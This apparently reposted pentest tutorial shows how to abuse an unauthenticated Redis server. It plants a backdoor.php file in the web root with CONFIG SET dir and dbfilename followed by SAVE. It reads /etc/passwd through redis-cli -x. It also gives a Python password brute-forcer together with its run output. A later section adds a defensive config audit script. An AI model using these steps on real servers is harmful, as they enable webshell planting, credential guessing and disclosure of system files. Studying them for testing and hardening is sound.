REDIS - Export File / Read File / Cracker

Source: Internet  Published under: Distributed cloud computing  Editor: 程序博客网  Time: 2024/06/02 04:34

Export File

If Redis and the web service run on the same server, we may be able to get a shell.

  1. Connect to the Redis port (default: 6379).

lab:~/ $ redis-cli -h localhost -p 6379

  2. Get the current configuration.

127.0.0.1:6379> CONFIG GET *
  1) "dbfilename"
  2) "dump.rdb"
  3) "requirepass"
  4) ""
  5) "masterauth"
  6) ""
  7) "unixsocket"
  8) ""
  9) "logfile"
 10) ""
 11) "pidfile"
 12) "/var/run/redis_6379.pid"
 13) "maxmemory"
 14) "3221225472"
 15) "maxmemory-samples"
 16) "5"
 17) "timeout"
 18) "0"
 19) "tcp-keepalive"
 20) "0"
 21) "auto-aof-rewrite-percentage"
 22) "100"
 23) "auto-aof-rewrite-min-size"
 24) "67108864"
 25) "hash-max-ziplist-entries"
 26) "512"
 27) "hash-max-ziplist-value"
 28) "64"
 29) "list-max-ziplist-entries"
 30) "512"
 31) "list-max-ziplist-value"
 32) "64"
 33) "set-max-intset-entries"
 34) "512"
 35) "zset-max-ziplist-entries"
 36) "128"
 37) "zset-max-ziplist-value"
 38) "64"
 39) "hll-sparse-max-bytes"
 40) "3000"
 41) "lua-time-limit"
 42) "5000"
 43) "slowlog-log-slower-than"
 44) "10000"
 45) "latency-monitor-threshold"
 46) "0"
 47) "slowlog-max-len"
 48) "128"
 49) "port"
 50) "6379"
 51) "tcp-backlog"
 52) "511"
 53) "databases"
 54) "16"
 55) "repl-ping-slave-period"
 56) "10"
 57) "repl-timeout"
 58) "60"
 59) "repl-backlog-size"
 60) "1048576"
 61) "repl-backlog-ttl"
 62) "3600"
 63) "maxclients"
 64) "10000"
 65) "watchdog-period"
 66) "0"
 67) "slave-priority"
 68) "100"
 69) "min-slaves-to-write"
 70) "0"
 71) "min-slaves-max-lag"
 72) "10"
 73) "hz"
 74) "10"
 75) "cluster-node-timeout"
 76) "15000"
 77) "cluster-migration-barrier"
 78) "1"
 79) "cluster-slave-validity-factor"
 80) "10"
 81) "repl-diskless-sync-delay"
 82) "5"
 83) "cluster-require-full-coverage"
 84) "yes"
 85) "no-appendfsync-on-rewrite"
 86) "no"
 87) "slave-serve-stale-data"
 88) "yes"
 89) "slave-read-only"
 90) "yes"
 91) "stop-writes-on-bgsave-error"
 92) "yes"
 93) "daemonize"
 94) "yes"
 95) "rdbcompression"
 96) "yes"
 97) "rdbchecksum"
 98) "yes"
 99) "activerehashing"
100) "yes"
101) "repl-disable-tcp-nodelay"
102) "no"
103) "repl-diskless-sync"
104) "no"
105) "aof-rewrite-incremental-fsync"
106) "yes"
107) "aof-load-truncated"
108) "yes"
109) "appendonly"
110) "no"
111) "dir"
112) "/var/redis/6379"
113) "maxmemory-policy"
114) "noeviction"
115) "appendfsync"
116) "everysec"
117) "save"
118) "900 1 300 10 60 10000"
119) "loglevel"
120) "notice"
121) "client-output-buffer-limit"
122) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
123) "unixsocketperm"
124) "0"
125) "slaveof"
126) ""
127) "notify-keyspace-events"
128) ""
129) "bind"
130) ""
127.0.0.1:6379>

  3. Export the DB file.
    During a pentest, we can export a web shell the same way.

127.0.0.1:6379> CONFIG SET dir /var/www/
OK
127.0.0.1:6379> CONFIG SET dbfilename backdoor.php
OK
127.0.0.1:6379> SET data "<?php phpinfo(); ?>"
OK
127.0.0.1:6379> SAVE
OK
127.0.0.1:6379> QUIT

The exported file is now served by the web server and shows the PHP information.

root@kali:~# curl -o data.txt http://localhost:8080/backdoor.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 50181    0 50181    0     0  2219k      0 --:--:-- --:--:-- --:--:-- 2450k
root@kali:~# grep --color -i -n -a phpinfo data.txt
25:<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>

REDIS FILE EXPORT

  4. Restore the Redis configuration.

Delete the key we created and restore the previous configuration.

127.0.0.1:6379> CONFIG SET dbfilename dump.rdb
OK
127.0.0.1:6379> CONFIG SET dir /var/redis/6379/
OK
127.0.0.1:6379> KEYS *
1) "bar"
2) "key"
3) "foo"
4) "data"
127.0.0.1:6379> DEL data
(integer) 1
127.0.0.1:6379> KEYS *
1) "bar"
2) "key"
3) "foo"
127.0.0.1:6379> SAVE
OK
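As an added example (not from the original post), a small Python audit that folds the flat output of CONFIG GET * into a dict and flags the settings the export step relies on: an empty requirepass, an empty bind, a dir under a web root, a dbfilename that is not an .rdb file, and protected-mode missing or off (that option only exists from Redis 3.2 on, so the output above, from an older build, does not report it). The web-root list and the three sample configs are constructed.

```python
# Added audit example (not part of the original post): parse the flat
# name/value list that `CONFIG GET *` returns and report the settings that
# let an unauthenticated client write a file into a web root via SAVE.
WEB_ROOTS = ("/var/www", "/usr/share/nginx", "/srv/http")  # assumed sample roots


def pairs_to_dict(flat):
    """CONFIG GET returns [name, value, name, value, ...]; fold it into a dict."""
    if len(flat) % 2:
        raise ValueError("CONFIG GET output must have an even number of items")
    return dict(zip(flat[0::2], flat[1::2]))


def audit_redis_config(flat):
    """Return (setting, reason) findings; an empty list means nothing flagged."""
    cfg = pairs_to_dict(flat)
    findings = []
    if cfg.get("requirepass", "") == "":
        findings.append(("requirepass", "empty: any client may run CONFIG SET and SAVE"))
    if cfg.get("bind", "") == "":
        findings.append(("bind", "empty: listening on every interface"))
    if cfg.get("protected-mode", "no") != "yes":
        findings.append(("protected-mode", "off or not reported (pre-3.2 build)"))
    d = cfg.get("dir", "").rstrip("/")
    if any(d == r or d.startswith(r + "/") for r in WEB_ROOTS):
        findings.append(("dir", "%s is under a web root: SAVE output is web-served" % d))
    name = cfg.get("dbfilename", "dump.rdb")
    if not name.endswith(".rdb"):
        findings.append(("dbfilename", "%s is not an .rdb file: possible planted file" % name))
    return findings


# Constructed samples: the values shown in the CONFIG GET output above, the same
# instance after the CONFIG SET commands of the export step, and a hardened one
# (the requirepass value is a placeholder, not a real secret).
AS_FOUND = ["dbfilename", "dump.rdb", "requirepass", "", "bind", "",
            "dir", "/var/redis/6379", "port", "6379"]
AFTER_EXPORT = ["dbfilename", "backdoor.php", "requirepass", "", "bind", "",
                "dir", "/var/www/", "port", "6379"]
HARDENED = ["dbfilename", "dump.rdb", "requirepass", "PLACEHOLDER-long-random-secret",
            "bind", "127.0.0.1", "protected-mode", "yes", "dir", "/var/redis/6379"]

if __name__ == "__main__":
    for label, sample in (("as found", AS_FOUND), ("after export", AFTER_EXPORT),
                          ("hardened", HARDENED)):
        print(label)
        for setting, reason in audit_redis_config(sample) or [("-", "no findings")]:
            print("  %-15s %s" % (setting, reason))
```

In practice the flat list comes from a Redis client's CONFIG GET call; on the instance above the first sample reproduces the three findings that made the export possible.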

Read File

redis-cli -x reads the last argument from standard input, so the contents of a file readable by the client can be stored in a hash field and fetched back with --raw:

redis-cli -x HSET passwd text </etc/passwd
redis-cli --raw HGET passwd text >/tmp/passwd
redis-cli DEL passwd

REDIS Cracker

If the Redis server sets a password, we can crack it with the following demo.

#!/usr/bin/env python
# -*- coding: utf8 -*-
import socket
import logging

logging.basicConfig(level=logging.DEBUG,
                    format="[*] %(funcName)s - %(message)s")
logger = logging.getLogger('redis_cracker')
BUFSIZE = 1024


def crack_redis(host, port, password):
    logger.debug('cracking redis %s:%s with %s' % (host, port, password))
    # create a socket for the redis connection
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ret = sock.connect_ex((host, port))
    # failed to make a redis connection
    if ret != 0:
        logging.info("failed to connect to redis")
        return False, None
    # check whether AUTH is enabled by sending an INFO request
    sock.send('INFO\r\n')
    # receive the socket response
    data = sock.recv(BUFSIZE)
    if "NOAUTH Authentication required" in data:
        # try the candidate password
        sock.send('AUTH %s\r\n' % password)
        data = sock.recv(BUFSIZE)
        # auth succeeded
        if "+OK" in data:
            logging.info("redis pass: [%s]\n" % password)
            return True, password
        # auth failed
        else:
            logging.debug("%s\n" % data.strip())
    else:
        logging.info("No password protection\n")
        return True, None
    return False, None


if __name__ == "__main__":
    passwords = ['admin', 'pass', 'password', '123']
    host = "localhost"
    port = 6379
    for p in passwords:
        found, pwd = crack_redis(host, port, p)
        if found:
            break

Now we can run it against the localhost Redis server.

root@kali:~# python2 crack_redis.py
[*] crack_redis - cracking redis localhost:6379 with admin
[*] crack_redis - -ERR invalid password
[*] crack_redis - cracking redis localhost:6379 with pass
[*] crack_redis - -ERR invalid password
[*] crack_redis - cracking redis localhost:6379 with password
[*] crack_redis - redis pass: [password]

The Redis password is [password].

root@kali:~# redis-cli -h localhost -p 6379
localhost:6379> AUTH password
OK

Authentication is successful.
